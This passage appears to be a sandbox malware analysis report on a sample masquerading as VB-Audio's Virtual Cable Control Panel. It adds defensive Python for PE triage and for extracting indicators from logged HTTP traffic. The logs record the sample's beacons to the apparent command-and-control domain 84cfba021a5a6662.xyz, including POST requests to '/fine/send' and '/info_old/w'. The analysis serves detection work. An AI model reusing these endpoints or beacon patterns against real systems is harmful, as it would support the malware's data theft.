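    _machine, nsec, _ts, _, _, opt_size, file_chars = struct.unpack_from("<HHIIIHH", data, coff_off)
    opt_off = coff_off + 20
    f = struct.unpack_from(OPT32_FMT, data, opt_off)
    if f[0] != 0x10B:
        raise ValueError("this example handles PE32 only")
    dirs = [struct.unpack_from("<II", data, opt_off + 96 + 8 * i) for i in range(f[29])]
    sections = []
    for i in range(nsec):
        name, vsize, va, rsize, *_, chars = struct.unpack_from(SECTION_FMT, data, opt_off + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode(), "vaddr": va, "vsize": vsize,
                         "rawsize": rsize, "chars": chars})
    return {"entry_rva": f[6], "image_base": f[9], "size_of_image": f[19], "dll_chars": f[23],
            "file_chars": file_chars, "dirs": dirs, "sections": sections}


def triage(data):
    """Static red flags a reviewer should pull out of a header like the one in the report."""
    pe = parse_pe(data)
    ep, findings = pe["entry_rva"], []
    for s in pe["sections"]:
        if s["chars"] & (IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE) and s["chars"] & IMAGE_SCN_MEM_WRITE:
            findings.append(f"writable code section {s['name']}: code can rewrite itself in place (unpacking stub)")
        if s["vaddr"] <= ep < s["vaddr"] + max(s["vsize"], s["rawsize"]):
            findings.append(f"entrypoint 0x{pe['image_base'] + ep:x} lies in {s['name']}")
    if pe["file_chars"] & IMAGE_FILE_RELOCS_STRIPPED or not pe["dll_chars"] & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE:
        findings.append(f"no ASLR: relocations stripped or DYNAMIC_BASE clear, image always maps at 0x{pe['image_base']:x}")
    if not pe["dll_chars"] & IMAGE_DLLCHARACTERISTICS_NX_COMPAT:
        findings.append("NX_COMPAT clear: binary does not opt in to DEP")
    cert_off, cert_size = pe["dirs"][IMAGE_DIRECTORY_ENTRY_SECURITY]
    if cert_size:
        # A certificate table only proves a signature blob is attached; validity needs a separate check
        findings.append(f"certificate table present at file offset 0x{cert_off:x} (0x{cert_size:x} bytes); presence is not validity")
    rsrc = next((s for s in pe["sections"] if s["name"] == ".rsrc"), None)
    if rsrc and rsrc["rawsize"] * 2 > pe["size_of_image"]:
        findings.append(f".rsrc is {rsrc['rawsize'] * 100 // pe['size_of_image']}% of the image: inspect resources for an embedded payload")
    return findings


if __name__ == "__main__":
    for line in triage(build_sample_image()):
        print("-", line)
```

The entrypoint test uses the larger of VirtualSize and SizeOfRawData deliberately: packers routinely leave a section's raw size smaller than its virtual size and place the entrypoint in the zero-filled tail, and a check against raw size alone would miss that.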

Resources

Name | RVA | Size | Type | Language | Country
RT_BITMAP | 0x124e0 | 0xbf518 | data | French | France
RT_ICON | 0x121e0 | 0x2e8 | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 4279173368, next used block 2163736576 | French | France
RT_MENU | 0xd19f8 | 0x3d4 | data | French | France
RT_GROUP_ICON | 0x124c8 | 0x14 | data | French | France
RT_VERSION | 0xd1dd0 | 0x3c0 | data | French | France
RT_MANIFEST | 0xd2190 | 0x3f9 | XML 1.0 document, ASCII text, with CRLF line terminators | French | France

The Type column is libmagic's guess over the raw resource bytes. The "dBase IV DBT" label on the 0x2e8-byte RT_ICON is a false positive on the icon's DIB header, not an embedded database. The single RT_BITMAP accounts for 0xbf518 of the 0xc0590 bytes of resource data and is the natural place to look for a payload the stub unpacks at run time.

Imports

DLL | Import
KERNEL32.dll | FlushFileBuffers, GetStringTypeW, GetStringTypeA, SetStdHandle, LoadLibraryA, GetOEMCP, GetACP, LCMapStringW, MultiByteToWideChar, GetCPInfo, SetFilePointer, WriteFile, TlsGetValue, SetLastError, DeviceIoControl, GetTickCount, CreateFileA, GetLastError, CreateMutexA, ReleaseMutex, WaitForSingleObject, CloseHandle, GetModuleHandleA, GetProcAddress, GetCurrentProcess, LCMapStringA, GetVersionExA, TlsAlloc, TlsSetValue, GetCurrentThreadId, GetFileType, GetStdHandle, HeapFree, HeapAlloc, HeapReAlloc, GetStartupInfoA, GetCommandLineA, GetVersion, ExitProcess, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InterlockedDecrement, InterlockedIncrement, GetModuleFileNameA, GetEnvironmentVariableA, HeapDestroy, HeapCreate, VirtualFree, VirtualAlloc, RtlUnwind, TerminateProcess, UnhandledExceptionFilter, FreeEnvironmentStringsA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStrings, GetEnvironmentStringsW, SetHandleCount
USER32.dll | GetMessageA, DispatchMessageA, TranslateMessage, LoadIconA, LoadCursorA, RegisterClassA, CreateWindowExA, ShowWindow, UpdateWindow, GetSystemMetrics, SetWindowPos, SetTimer, BeginPaint, EndPaint, KillTimer, PostQuitMessage, GetDC, ReleaseDC, DefWindowProcA, MessageBoxA, DrawTextA, LoadBitmapA, PostMessageA, SystemParametersInfoA
GDI32.dll | SetBkMode, SetTextColor, Rectangle, CreateCompatibleDC, SelectObject, GetObjectA, BitBlt, DeleteDC, DeleteObject, CreateFontIndirectA, CreateBrushIndirect, GetStockObject
ADVAPI32.dll | RegOpenKeyExA, RegCreateKeyExA, RegOpenKeyA, RegCreateKeyA, RegSetValueExA, RegCloseKey
SHELL32.dll | ShellExecuteA
SETUPAPI.dll | SetupDiGetClassDevsA, SetupDiEnumDeviceInterfaces, SetupDiGetDeviceInterfaceDetailA, SetupDiDestroyDeviceInfoList

Version Infos

Description | Data
LegalCopyright | V.Burel2012-2015
InternalName | VBCABLE_ControlPanel
FileVersion | 1, 0, 3, 5
CompanyName | VB-AUDIO Software
Comments | VB-AUDIO Control Panel forVB-Audio Virtual Cable
ProductName | VBCABLE_ControlPanel
ProductVersion | 1, 0, 3, 5
FileDescription | VB-AUDIO Virtual Cable Control Panel
OriginalFilename | VBCABLE_ControlPanel.exe
Translation | 0x0000 0x04b0

These strings are copied verbatim from the RT_VERSION resource (0xd1dd0, 0x3c0 bytes) and are written by whoever built the file. They claim the identity of VB-Audio's VBCABLE_ControlPanel.exe but authenticate nothing on their own, and the Authenticode block above is empty, so treat them as a claim to verify against the vendor's genuine release, not as provenance.

Possible Origin

Language of compilation system  Country where language is spoken
French                          France

Network Behavior

Network Port Distribution

TCP Packets

Timestamp                            Source Port  Dest Port  Source IP     Dest IP
Jan 29, 2021 17:36:38.256937981 CET  49725        80         192.168.2.6   104.21.23.16
Jan 29, 2021 17:36:38.306694031 CET  80           49725      104.21.23.16  192.168.2.6
Jan 29, 2021 17:36:38.306782007 CET  49725        80         192.168.2.6   104.21.23.16
Jan 29, 2021 17:36:38.307451963 CET  49725        80         192.168.2.6   104.21.23.16
Jan 29, 2021 17:36:38.307509899 CET  49725        80         192.168.2.6   104.21.23.16
Jan 29, 2021 17:36:38.355701923 CET  80           49725      104.21.23.16  192.168.2.6
Jan 29, 2021 17:36:38.355820894 CET  80           49725      104.21.23.16  192.168.2.6
Jan 29, 2021 17:36:38.379690886 CET  80           49725      104.21.23.16  192.168.2.6
Jan 29, 2021 17:36:38.379713058 CET  80           49725      104.21.23.16  192.168.2.6
Jan 29, 2021 17:36:38.379725933 CET  80           49725      104.21.23.16  192.168.2.6
Jan 29, 2021 17:36:38.379738092 CET  80           49725      104.21.23.16  192.168.2.6
Jan 29, 2021 17:36:38.379745007 CET  80           49725      104.21.23.16  192.168.2.6
Jan 29, 2021 17:36:38.379833937 CET  49725        80         192.168.2.6   104.21.23.16
Jan 29, 2021 17:36:38.392950058 CET  49725        80         192.168.2.6   104.21.23.16
Jan 29, 2021 17:36:38.392991066 CET  49725        80         192.168.2.6   104.21.23.16
Jan 29, 2021 17:36:38.439117908 CET  80           49725      104.21.23.16  192.168.2.6
Jan 29, 2021 17:36:38.439142942 CET  80           49725      104.21.23.16  192.168.2.6
Jan 29, 2021 17:36:38.444030046 CET  80           49725      104.21.23.16  192.168.2.6
Jan 29, 2021 17:36:38.444063902 CET  80           49725      104.21.23.16  192.168.2.6
Jan 29, 2021 17:36:38.444089890 CET  80           49725      104.21.23.16  192.168.2.6
Jan 29, 2021 17:36:38.444117069 CET  80           49725      104.21.23.16  192.168.2.6
Jan 29, 2021 17:36:38.444120884 CET  49725        80         192.168.2.6   104.21.23.16
Jan 29, 2021 17:36:38.444150925 CET  80           49725      104.21.23.16  192.168.2.6
Jan 29, 2021 17:36:38.444159985 CET  49725        80         192.168.2.6   104.21.23.16
Jan 29, 2021 17:36:38.485577106 CET  49725        80         192.168.2.6   104.21.23.16
Jan 29, 2021 17:36:38.555047035 CET  49725        80         192.168.2.6   104.21.23.16
Jan 29, 2021 17:36:38.555078983 CET  49725        80         192.168.2.6   104.21.23.16
Jan 29, 2021 17:36:38.601149082 CET  80           49725      104.21.23.16  192.168.2.6
Jan 29, 2021 17:36:38.601165056 CET  80           49725      104.21.23.16  192.168.2.6
Jan 29, 2021 17:36:38.608758926 CET  80           49725      104.21.23.16  192.168.2.6
Jan 29, 2021 17:36:38.608782053 CET  80           49725      104.21.23.16  192.168.2.6
Jan 29, 2021 17:36:38.609004974 CET  49725        80         192.168.2.6   104.21.23.16
Jan 29, 2021 17:36:38.609302998 CET  80           49725      104.21.23.16  192.168.2.6
Jan 29, 2021 17:36:38.609328032 CET  80           49725      104.21.23.16  192.168.2.6
Jan 29, 2021 17:36:38.609415054 CET  49725        80         192.168.2.6   104.21.23.16
Jan 29, 2021 17:36:38.610405922 CET  80           49725      104.21.23.16  192.168.2.6
Jan 29, 2021 17:36:38.657092094 CET  49725        80         192.168.2.6   104.21.23.16
Jan 29, 2021 17:36:40.871623993 CET  49725        80         192.168.2.6   104.21.23.16
Jan 29, 2021 17:36:40.871685028 CET  49725        80         192.168.2.6   104.21.23.16
Jan 29, 2021 17:36:40.918102980 CET  80           49725      104.21.23.16  192.168.2.6
Jan 29, 2021 17:36:40.918132067 CET  80           49725      104.21.23.16  192.168.2.6
Jan 29, 2021 17:36:40.932384968 CET  80           49725      104.21.23.16  192.168.2.6
Jan 29, 2021 17:36:40.932411909 CET  80           49725      104.21.23.16  192.168.2.6
Jan 29, 2021 17:36:40.932545900 CET  49725        80         192.168.2.6   104.21.23.16
Jan 29, 2021 17:36:40.932952881 CET  80           49725      104.21.23.16  192.168.2.6
Jan 29, 2021 17:36:40.932970047 CET  80           49725      104.21.23.16  192.168.2.6
Jan 29, 2021 17:36:40.933042049 CET  49725        80         192.168.2.6   104.21.23.16
Jan 29, 2021 17:36:40.933917999 CET  80           49725      104.21.23.16  192.168.2.6
Jan 29, 2021 17:36:40.985033989 CET  49725        80         192.168.2.6   104.21.23.16
Jan 29, 2021 17:36:46.548799992 CET  49729        80         192.168.2.6   104.21.23.16
Jan 29, 2021 17:36:46.594649076 CET  80           49729      104.21.23.16  192.168.2.6
Jan 29, 2021 17:36:46.595305920 CET  49729        80         192.168.2.6   104.21.23.16
Jan 29, 2021 17:36:46.603761911 CET  49729        80         192.168.2.6   104.21.23.16
Jan 29, 2021 17:36:46.603826046 CET  49729        80         192.168.2.6   104.21.23.16
Jan 29, 2021 17:36:46.653562069 CET  80           49729      104.21.23.16  192.168.2.6
Jan 29, 2021 17:36:46.653582096 CET  80           49729      104.21.23.16  192.168.2.6
Jan 29, 2021 17:36:46.686892033 CET  49730        80         192.168.2.6   104.21.23.16
Jan 29, 2021 17:36:46.695880890 CET  80           49729      104.21.23.16  192.168.2.6
Jan 29, 2021 17:36:46.696003914 CET  80           49729      104.21.23.16  192.168.2.6
Jan 29, 2021 17:36:46.696084023 CET  80           49729      104.21.23.16  192.168.2.6
Jan 29, 2021 17:36:46.696084976 CET  49729        80         192.168.2.6   104.21.23.16
Jan 29, 2021 17:36:46.696126938 CET  80           49729      104.21.23.16  192.168.2.6
Jan 29, 2021 17:36:46.696185112 CET  49729        80         192.168.2.6   104.21.23.16
Jan 29, 2021 17:36:46.696902990 CET  80           49729      104.21.23.16  192.168.2.6
Jan 29, 2021 17:36:46.727946997 CET  49725        80         192.168.2.6   104.21.23.16
Jan 29, 2021 17:36:46.732964993 CET  80           49730      104.21.23.16  192.168.2.6
Jan 29, 2021 17:36:46.733454943 CET  49730        80         192.168.2.6   104.21.23.16
Jan 29, 2021 17:36:46.738434076 CET  49730        80         192.168.2.6   104.21.23.16
Jan 29, 2021 17:36:46.738558054 CET  49730        80         192.168.2.6   104.21.23.16
Jan 29, 2021 17:36:46.784315109 CET  80           49730      104.21.23.16  192.168.2.6
Jan 29, 2021 17:36:46.784346104 CET  80           49730      104.21.23.16  192.168.2.6
Jan 29, 2021 17:36:46.807162046 CET  80           49730      104.21.23.16  192.168.2.6
Jan 29, 2021 17:36:46.807198048 CET  80           49730      104.21.23.16  192.168.2.6
Jan 29, 2021 17:36:46.807224989 CET  80           49730      104.21.23.16  192.168.2.6
Jan 29, 2021 17:36:46.807250023 CET  80           49730      104.21.23.16  192.168.2.6
Jan 29, 2021 17:36:46.807271957 CET  80           49730      104.21.23.16  192.168.2.6
Jan 29, 2021 17:36:46.807357073 CET  49730        80         192.168.2.6   104.21.23.16
Jan 29, 2021 17:36:46.807379961 CET  49730        80         192.168.2.6   104.21.23.16
Jan 29, 2021 17:36:46.876214027 CET  49729        80         192.168.2.6   104.21.23.16
Jan 29, 2021 17:36:49.255383968 CET  49729        80         192.168.2.6   104.21.23.16
Jan 29, 2021 17:36:49.255412102 CET  49729        80         192.168.2.6   104.21.23.16
Jan 29, 2021 17:36:49.302926064 CET  80           49729      104.21.23.16  192.168.2.6
Jan 29, 2021 17:36:49.302954912 CET  80           49729      104.21.23.16  192.168.2.6
Jan 29, 2021 17:36:49.311367989 CET  80           49729      104.21.23.16  192.168.2.6
Jan 29, 2021 17:36:49.311407089 CET  80           49729      104.21.23.16  192.168.2.6
Jan 29, 2021 17:36:49.311429977 CET  80           49729      104.21.23.16  192.168.2.6
Jan 29, 2021 17:36:49.311451912 CET  80           49729      104.21.23.16  192.168.2.6
Jan 29, 2021 17:36:49.311466932 CET  80           49729      104.21.23.16  192.168.2.6
Jan 29, 2021 17:36:49.311543941 CET  49729        80         192.168.2.6   104.21.23.16
Jan 29, 2021 17:36:49.311564922 CET  49729        80         192.168.2.6   104.21.23.16
Jan 29, 2021 17:36:52.775774956 CET  49729        80         192.168.2.6   104.21.23.16
Jan 29, 2021 17:36:55.304384947 CET  49730        80         192.168.2.6   104.21.23.16
Jan 29, 2021 17:36:55.304445028 CET  49730        80         192.168.2.6   104.21.23.16
Jan 29, 2021 17:36:55.352152109 CET  80           49730      104.21.23.16  192.168.2.6
Jan 29, 2021 17:36:55.352173090 CET  80           49730      104.21.23.16  192.168.2.6
Jan 29, 2021 17:36:55.358536005 CET  80           49730      104.21.23.16  192.168.2.6
Jan 29, 2021 17:36:55.358561039 CET  80           49730      104.21.23.16  192.168.2.6
Jan 29, 2021 17:36:55.358577013 CET  80           49730      104.21.23.16  192.168.2.6
Jan 29, 2021 17:36:55.358596087 CET  80           49730      104.21.23.16  192.168.2.6
Jan 29, 2021 17:36:55.358608961 CET  80           49730      104.21.23.16  192.168.2.6

UDP Packets

Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Jan 29, 2021 17:36:25.088690996 CET  60261        53         192.168.2.6  8.8.8.8
Jan 29, 2021 17:36:25.145237923 CET  53           60261      8.8.8.8      192.168.2.6
Jan 29, 2021 17:36:26.123815060 CET  56061        53         192.168.2.6  8.8.8.8
Jan 29, 2021 17:36:26.173882008 CET  53           56061      8.8.8.8      192.168.2.6
Jan 29, 2021 17:36:27.246218920 CET  58336        53         192.168.2.6  8.8.8.8
Jan 29, 2021 17:36:27.296982050 CET  53           58336      8.8.8.8      192.168.2.6
Jan 29, 2021 17:36:29.067965031 CET  53781        53         192.168.2.6  8.8.8.8
Jan 29, 2021 17:36:29.116146088 CET  53           53781      8.8.8.8      192.168.2.6
Jan 29, 2021 17:36:31.026458979 CET  54064        53         192.168.2.6  8.8.8.8
Jan 29, 2021 17:36:31.077909946 CET  53           54064      8.8.8.8      192.168.2.6
Jan 29, 2021 17:36:35.485811949 CET  52811        53         192.168.2.6  8.8.8.8
Jan 29, 2021 17:36:35.537560940 CET  53           52811      8.8.8.8      192.168.2.6
Jan 29, 2021 17:36:36.429775953 CET  55299        53         192.168.2.6  8.8.8.8
Jan 29, 2021 17:36:36.477709055 CET  53           55299      8.8.8.8      192.168.2.6
Jan 29, 2021 17:36:37.372859001 CET  63745        53         192.168.2.6  8.8.8.8
Jan 29, 2021 17:36:37.424420118 CET  53           63745      8.8.8.8      192.168.2.6
Jan 29, 2021 17:36:38.183897018 CET  50055        53         192.168.2.6  8.8.8.8
Jan 29, 2021 17:36:38.242616892 CET  53           50055      8.8.8.8      192.168.2.6
Jan 29, 2021 17:36:38.614181042 CET  61374        53         192.168.2.6  8.8.8.8
Jan 29, 2021 17:36:38.665256977 CET  53           61374      8.8.8.8      192.168.2.6
Jan 29, 2021 17:36:39.602166891 CET  50339        53         192.168.2.6  8.8.8.8
Jan 29, 2021 17:36:39.651047945 CET  53           50339      8.8.8.8      192.168.2.6
Jan 29, 2021 17:36:44.965429068 CET  63307        53         192.168.2.6  8.8.8.8
Jan 29, 2021 17:36:45.016309977 CET  53           63307      8.8.8.8      192.168.2.6
Jan 29, 2021 17:36:46.307152033 CET  49694        53         192.168.2.6  8.8.8.8
Jan 29, 2021 17:36:46.366413116 CET  53           49694      8.8.8.8      192.168.2.6
Jan 29, 2021 17:36:46.616519928 CET  54982        53         192.168.2.6  8.8.8.8
Jan 29, 2021 17:36:46.676454067 CET  53           54982      8.8.8.8      192.168.2.6
Jan 29, 2021 17:36:55.323558092 CET  50010        53         192.168.2.6  8.8.8.8
Jan 29, 2021 17:36:55.371407986 CET  53           50010      8.8.8.8      192.168.2.6
Jan 29, 2021 17:37:01.078157902 CET  63718        53         192.168.2.6  8.8.8.8
Jan 29, 2021 17:37:01.138761044 CET  53           63718      8.8.8.8      192.168.2.6
Jan 29, 2021 17:37:04.603930950 CET  62116        53         192.168.2.6  8.8.8.8
Jan 29, 2021 17:37:04.668473959 CET  53           62116      8.8.8.8      192.168.2.6
Jan 29, 2021 17:37:13.479643106 CET  63816        53         192.168.2.6  8.8.8.8
Jan 29, 2021 17:37:13.538614035 CET  53           63816      8.8.8.8      192.168.2.6
Jan 29, 2021 17:37:14.001022100 CET  55014        53         192.168.2.6  8.8.8.8
Jan 29, 2021 17:37:14.051728010 CET  53           55014      8.8.8.8      192.168.2.6
Jan 29, 2021 17:37:18.883923054 CET  62208        53         192.168.2.6  8.8.8.8
Jan 29, 2021 17:37:18.947933912 CET  53           62208      8.8.8.8      192.168.2.6
Jan 29, 2021 17:37:22.242372036 CET  57574        53         192.168.2.6  8.8.8.8
Jan 29, 2021 17:37:22.304270029 CET  53           57574      8.8.8.8      192.168.2.6
Jan 29, 2021 17:37:25.115819931 CET  51818        53         192.168.2.6  8.8.8.8
Jan 29, 2021 17:37:25.178251028 CET  53           51818      8.8.8.8      192.168.2.6
Jan 29, 2021 17:37:25.818749905 CET  56628        53         192.168.2.6  8.8.8.8
                                                                                                                                                    Jan 29, 2021 17:37:25.875405073 CET53566288.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:26.384660959 CET6077853192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:37:26.440682888 CET53607788.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:26.932027102 CET5379953192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:37:26.945055962 CET5468353192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:37:26.996061087 CET53537998.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:27.001338005 CET53546838.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:27.584101915 CET5932953192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:37:27.643075943 CET53593298.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:28.364412069 CET6402153192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:37:28.420788050 CET53640218.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:29.372565985 CET5612953192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:37:29.429075956 CET53561298.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:30.486442089 CET5817753192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:37:30.547898054 CET53581778.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:30.968092918 CET5070053192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:37:31.028464079 CET53507008.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:57.457674980 CET5406953192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:37:57.531764030 CET53540698.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:59.003036022 CET6117853192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:37:59.051980019 CET53611788.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:59.292176962 CET5701753192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:37:59.340296984 CET53570178.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:38:00.370244980 CET5632753192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:38:00.426605940 CET53563278.8.8.8192.168.2.6

                                                                                                                                                    DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 29, 2021 17:36:38.183897018 CET | 192.168.2.6 | 8.8.8.8 | 0x4985 | Standard query (0) | 84cfba021a5a6662.xyz | A (IP address) | IN (0x0001)
Jan 29, 2021 17:36:46.307152033 CET | 192.168.2.6 | 8.8.8.8 | 0x9edc | Standard query (0) | 84cfba021a5a6662.xyz | A (IP address) | IN (0x0001)
Jan 29, 2021 17:36:46.616519928 CET | 192.168.2.6 | 8.8.8.8 | 0xda23 | Standard query (0) | 84cfba021a5a6662.xyz | A (IP address) | IN (0x0001)
Jan 29, 2021 17:37:04.603930950 CET | 192.168.2.6 | 8.8.8.8 | 0xd253 | Standard query (0) | 84CFBA021A5A6662.xyz | A (IP address) | IN (0x0001)

                                                                                                                                                    DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 29, 2021 17:36:38.242616892 CET | 8.8.8.8 | 192.168.2.6 | 0x4985 | No error (0) | 84cfba021a5a6662.xyz | | 104.21.23.16 | A (IP address) | IN (0x0001)
Jan 29, 2021 17:36:38.242616892 CET | 8.8.8.8 | 192.168.2.6 | 0x4985 | No error (0) | 84cfba021a5a6662.xyz | | 172.67.208.74 | A (IP address) | IN (0x0001)
Jan 29, 2021 17:36:46.366413116 CET | 8.8.8.8 | 192.168.2.6 | 0x9edc | No error (0) | 84cfba021a5a6662.xyz | | 104.21.23.16 | A (IP address) | IN (0x0001)
Jan 29, 2021 17:36:46.366413116 CET | 8.8.8.8 | 192.168.2.6 | 0x9edc | No error (0) | 84cfba021a5a6662.xyz | | 172.67.208.74 | A (IP address) | IN (0x0001)
Jan 29, 2021 17:36:46.676454067 CET | 8.8.8.8 | 192.168.2.6 | 0xda23 | No error (0) | 84cfba021a5a6662.xyz | | 104.21.23.16 | A (IP address) | IN (0x0001)
Jan 29, 2021 17:36:46.676454067 CET | 8.8.8.8 | 192.168.2.6 | 0xda23 | No error (0) | 84cfba021a5a6662.xyz | | 172.67.208.74 | A (IP address) | IN (0x0001)
Jan 29, 2021 17:37:04.668473959 CET | 8.8.8.8 | 192.168.2.6 | 0xd253 | No error (0) | 84CFBA021A5A6662.xyz | | 104.21.23.16 | A (IP address) | IN (0x0001)
Jan 29, 2021 17:37:04.668473959 CET | 8.8.8.8 | 192.168.2.6 | 0xd253 | No error (0) | 84CFBA021A5A6662.xyz | | 172.67.208.74 | A (IP address) | IN (0x0001)

                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                    • 84cfba021a5a6662.xyz
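
The HTTP Packets records below are what a practitioner turns into indicators, with one caveat the raw log hides: every 200 OK in them comes from Cloudflare (Server: cloudflare) and its body is the "Suspected phishing site" interstitial, not a reply from the C2 itself. The beacon URIs, User-Agent and Content-Length values are therefore usable indicators, but the responses say nothing about what the server would have returned. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it parses the fused row layout the sandbox exports (timestamp, kBytes transferred, IN/OUT, first line), also accepting the same fields separated by " | ", decodes the "Data Raw" hex dump, strips the chunked-encoding size line and checks the page title before calling a 200 OK a live C2 reply. The log excerpt embedded in it is constructed and shortened from this report; the function and class names are the example's own.

```python
"""Parse a sandbox "HTTP Packets" log, pull beacon indicators from the
outbound requests and decode each response's hex "Data Raw" dump."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Constructed, shortened excerpt of this report's HTTP log.  Row lines follow the
# sandbox layout (timestamp, kBytes, IN/OUT, first line), fused as exported or
# separated with " | "; the hex bytes are copied from the report's first 200 OK
# (chunk-size line, <!DOCTYPE html>, <head> and the <title> element).
SAMPLE_LOG = """\
Jan 29, 2021 17:36:38.307451963 CET104OUTPOST //fine/send HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 82
Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:36:38.379690886 CET105INHTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Server: cloudflare
Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a
Jan 29, 2021 17:36:38.392950058 CET | 110 | OUT | POST /info_old/w HTTP/1.1
Content-Length: 81
Host: 84cfba021a5a6662.xyz
"""

ROW_RE = re.compile(r"^(\w{3} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2}\.\d+ [A-Z]{3,4})"
                    r"\s*\|?\s*(\d+)\s*\|?\s*(OUT|IN)\s*\|?\s*(.*)$")
HEADER_RE = re.compile(r"^([A-Za-z0-9-]+): ?(.*)$")


@dataclass
class Packet:
    timestamp: str
    kbytes: int
    direction: str                      # OUT = sample to server, IN = server to sample
    start_line: str                     # request line or status line
    headers: Dict[str, str] = field(default_factory=dict)
    raw: bytes = b""                    # decoded Data Raw dump (sandbox truncates long bodies)


def parse_log(text: str) -> List[Packet]:
    packets: List[Packet] = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            packets.append(Packet(m.group(1), int(m.group(2)), m.group(3), m.group(4).strip()))
        elif not packets or line.startswith("Data Ascii:"):
            continue                    # Data Ascii only re-renders Data Raw; skip it
        elif line.startswith("Data Raw:"):
            packets[-1].raw = bytes.fromhex(line.split(":", 1)[1])
        else:
            h = HEADER_RE.match(line)
            if h:
                packets[-1].headers[h.group(1).lower()] = h.group(2)
    return packets


def first_chunk(body: bytes) -> Tuple[int, bytes]:
    """Declared size of the first chunk and the chunk bytes actually dumped."""
    size_line, _, data = body.partition(b"\r\n")
    return int(size_line.split(b";")[0], 16), data


def response_body(p: Packet) -> bytes:
    if p.headers.get("transfer-encoding", "").lower() == "chunked":
        return first_chunk(p.raw)[1]
    return p.raw


def page_title(html: bytes) -> Optional[str]:
    m = re.search(rb"<title>(.*?)</title>", html, re.S)
    return m.group(1).decode("utf-8", "replace").strip() if m else None


def classify_response(p: Packet) -> str:
    """A 200 OK only proves a live C2 if the body is not an edge interstitial;
    Cloudflare's phishing block page carries Server: cloudflare and a fixed title."""
    if p.direction != "IN" or not p.raw:
        return "no-body"
    title = (page_title(response_body(p)) or "").lower()
    if p.headers.get("server", "").lower() == "cloudflare" and "suspected phishing" in title:
        return "blocked-by-edge"
    return "served"


def extract_iocs(packets: List[Packet]) -> Dict[str, list]:
    """Host, method+path, User-Agent and beacon sizes from the outbound requests."""
    hosts, requests, agents, sizes = set(), set(), set(), set()
    for p in packets:
        if p.direction != "OUT":
            continue
        method, _, rest = p.start_line.partition(" ")
        requests.add(f"{method} {rest.rsplit(' ', 1)[0]}")   # drop the HTTP/1.1 token
        if "host" in p.headers:
            hosts.add(p.headers["host"])
        if "user-agent" in p.headers:
            agents.add(p.headers["user-agent"])
        if "content-length" in p.headers:
            sizes.add(int(p.headers["content-length"]))
    return {"hosts": sorted(hosts), "requests": sorted(requests),
            "user_agents": sorted(agents), "content_lengths": sorted(sizes)}


if __name__ == "__main__":
    pkts = parse_log(SAMPLE_LOG)
    print(extract_iocs(pkts))
    for p in (x for x in pkts if x.direction == "IN"):
        declared, data = first_chunk(p.raw)
        print(f"{p.start_line}: chunk declares {declared} bytes, dump holds {len(data)}; "
              f"title={page_title(data)!r}; verdict={classify_response(p)}")
```

The chunk-size line is why the report's "Data Ascii" rendering starts with "10d3": that is the hex length (4307 bytes) of the first chunk, not page content. Comparing the declared size with the number of bytes the dump holds tells you how much of the body the sandbox cut off, which matters before concluding anything from an apparently short response.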

                                                                                                                                                    HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.6 | 49725 | 104.21.23.16 | 80 | C:\Users\user\Desktop\Cyfj6XGbkd.exe
Timestamp | kBytes transferred | Direction | Data
Jan 29, 2021 17:36:38.307451963 CET | 104 | OUT | POST //fine/send HTTP/1.1
                                                                                                                                                    Cache-Control: no-cache
